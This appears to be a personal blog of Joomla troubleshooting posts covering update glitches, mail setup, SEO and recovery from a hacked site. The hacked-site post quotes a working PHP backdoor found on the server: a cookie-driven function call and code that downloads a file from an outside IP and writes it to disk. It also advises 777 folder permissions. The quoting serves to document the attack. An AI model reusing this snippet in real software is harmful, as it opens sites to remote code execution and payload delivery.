Joomla 3.6.3 Unable To Edit Module

I updated a bunch of sites yesterday after the 3.6.3 release. When I went to add the login module the edit page was complete white with a drop down box. I was deeply concerned and thought maybe this Gantry template was the issue. It was not. I found this page.

https://forum.joomla.org/viewtopic.php?f=709&p=3435967

I refreshed the browser window and everything was fine. Basically came down to Joomla worked on their caching component and you need to manually refresh the page.

Another install I upgraded simply refreshing the cache did not work. I was using Firefox. Firefox is making it tough to find the delete recent history. I had to close out of the administrative area all together. Open a new tab and then the modules were be having the way they should.

The articles are a different story. When I go into edit an article I get the following message.

joomla_3_6_3_update_error

I can still edit and save the article

I hope this helps someone else out there.

 

Help Sucuri Clean Sites

Sucuri Antivirus is a great service. I found an attack on a Joomla 3.5 site where a PayPal form and zip file were inserted into the images folder.

There were the following clues to the attack:

  • PHP & INI files in the images directory
  • New folders called “bt”, “BT”, and “mic” in the images directory.

I contacted Sucuri to see if they wanted my findings and they have an email address to accept this kind of information …. labs@sucuri.net

I hope this helps someone else out there…

 

JS Jobs – Not Displaying Company Logo on Job Search

I am taking JS Jobs component out for a test drive. I posted a few test jobs from a test company and logo doesn’t show on the jobs page.

I was able to get this to work by doing the following.

In the file “components/com_jsjobs/views/job/joblisting.php” line 75,  I added the following.

<img src="'. $path  .'">'

The whole line now looks like

$html .=        '<div class="js-image"><img src="'. $path  .'">';

I hope this helps someone else out there…

 

Solved – Joomla 3 Localhost – Could not instantiate mail function.

While working on a Joomla site in WAMP I went to test the email and got the following error.

Notice
Could not instantiate mail function.

Here is how I fixed this. This could be the long way, but it worked for me.

  1. I had to set up sendmail. I wrote about my best solution for localhost in this post.
    http://blog.grimeymedia.com/setting-up-mail-service-in-wamp/
  2. Then in Joomla I went to Global Configuration  >> Server tab. At the bottom is “Mail Settings”.
  3. I changed “Mailer” to “Sendmail”, and set the path to  “C:\wamp\sendmail\sendmail.exe”
    sendmail_path_joomla

I hope this helps someone else out there…

 

Joomla Security Check Extension – trying this one out

Got an email from Joomshine about security. I have had a couple of Joomla sites get attacked, and really want not have to deal with lack of faith that the site is attacker proof.

I downloaded this plugin “Securitycheck”, and I am going to take it for a test run. I will let you know how it goes.  Here is the link.

https://extensions.joomla.org/extension/securitycheck

I hope this helps someone else out there…

 

Joomla SEO – Cloud Access.net’s guide

I am working on a site’s SEO. In June I did what I thought was a good process

  1. Adjust the page titles
  2. Adjust the page discriptions
  3. Set SEF title and Mod ReWrite

But now in September I feel like there is a significant drop off; although, the traffic seems to be better traffic. The numbers don’t assure me that my techniques were good.

 

I stumbbled upon this video by CloudAccess.
https://www.youtube.com/watch?v=Y5et1JZ3BjY

They recommend using Google Adwords tool.
Google AdWords Keyword Tool 

 

Here is a link to Cloud Access’s Guide to SEO.

http://www.cloudaccess.net/additional-resources/56-search-engine-optimization-seo.html

I am going to review this and see if it helps.

 

They used pingdom.com to test load times of their pages.

 

I also came across this video from a Joomla Day

This guy really recommend sh404SEF.

He also schooled me on CDN (content delivery network) – for distributing your images across different servers around the world so when your site is accessed from someone far away they will be pulling the images from a server that is closer to them.

I hope this helps someone else out there…

 

 

Google Analytics – Joomla 3.6.2 – frequent queries

Looking at a customers analytics I see the following a lot.

“please enter the email address for your account. a verification code will be sent to you. once you have received the verification code, you will be able to choose a new password for your account.”

This is when you need to recover your password.

This text is located in “language/en-GB/en-GB.com_users.ini”.  I used Notepad++ to easy edit this text in hoping it will change the results.

I hope this helps someone else out there…

 

 

Hacked Joomla 3.6.2 site – cms brute rmf 3.0.zip file found in Godaddy hosting.

Had a recent Joomla 3.6.2 install go blank. Site was fine one day and the next it was unreachable.

I FTP’ed into the site and I see WordPress folders in there and other strange files. There was a zip file called “cms brute rmf 3.0.zip”. Thre were odd PHP files such a “ebb6bff35a.php”. Look like an attack for sure. The PHP file was extremely complex.

The file “ebb6bff35a.php” starts out by grabbing the id set in a cookie for “user id” then points back the following ip with the cookie information. This IP stems from Belize.

if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);

if( isset($_REQUEST[“test_url”]) ){

echo “file test okay”; }

$f =$_GET[“d”];

$id=$f;

$current = file_get_contents(“http://80.87.205.79/$f”);

file_put_contents($id, $current);

if (!defined(‘PCLZIP_READ_BLOCK_SIZE’)) {

define( ‘PCLZIP_READ_BLOCK_SIZE’, 2048 );

}

files_in_joomla_install

Hopefully I can figure out what happen, but I am worried about security for sure.

 

After contacting Godaddy it looks like a complete attack. Uploaded PHP files, directories were created, and I didn’t get to check the database. Had to do a GoDaddy account reset and restore from an Akeeba backup.

The backup didn’t go well I got the following error.

akeeba_ajax_error

I followed the instructions on this page.

https://www.akeebabackup.com/documentation/troubleshooter/kscantextract.html

I had to create the “kicktemp” folder. Set the permissions to 777.  Set the type of install to FTP. For the root directory I had to use “/”.  Make sure to test the FTP connection.

The Kickstart restore took about 25 minutes to restore.

Here are the specs on the site.

  • Joomla 3.6.2
  • JCE
  • Akeeba
  • Chronoforms
  • JO Facebook Events Pro
  • Hot Themes Hot Fitness template.

One of the worst parts of this whole debacle is their SEO. The site was live for a month before the attack and the analytics were clicking along nicely. The site was getting around 300 plus hits a in the first month with around 100 key word matches.

During the attack the number of key word matches jumped to 16,000 matches and incredibility junky results.

analytics

This is a running store and have nothing to do with “sexy turkey”.  This all happened in just a few days. I really hope this doesn’t offend Google and they decide to block the site.

I hope this helps someone else out there…

 

Follow up:

A month later after this attack I looked at all of the directories and found no trace of another attack.